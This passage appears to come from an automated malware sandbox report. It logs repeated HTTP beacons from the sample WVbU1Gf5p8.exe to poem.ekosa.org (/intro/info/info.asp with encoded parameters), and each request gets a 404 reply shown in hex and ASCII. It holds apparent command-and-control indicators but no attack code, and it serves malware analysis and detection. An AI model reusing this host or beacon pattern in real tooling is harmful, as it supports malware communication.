      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      46192.168.2.449813210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:24.011401892 CET489OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:24.282001972 CET490INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:24 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      47192.168.2.449814210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:24.547841072 CET490OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:24.808159113 CET491INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:24 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      48192.168.2.449815210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:25.193589926 CET492OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:25.463578939 CET492INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:25 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      49192.168.2.449816210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:25.729624033 CET493OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:25.991885900 CET493INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:25 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      5192.168.2.449763210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:54:59.492043972 CET109OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:54:59.760138988 CET115INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:54:59 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      50192.168.2.449817210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:26.297059059 CET494OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:26.560982943 CET495INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:26 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      51192.168.2.449818210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:26.957791090 CET495OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:27.229217052 CET496INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:26 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      52192.168.2.449819210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:27.505677938 CET497OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:27.777065039 CET497INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:27 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      53192.168.2.449820210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:28.050844908 CET498OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:28.313766956 CET498INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:27 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      54192.168.2.449821210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:28.720854044 CET499OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:28.988908052 CET500INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:28 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      55192.168.2.449822210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:29.263376951 CET500OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:29.530343056 CET501INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:28 GMT
      Connection: close
      Content-Length: 315
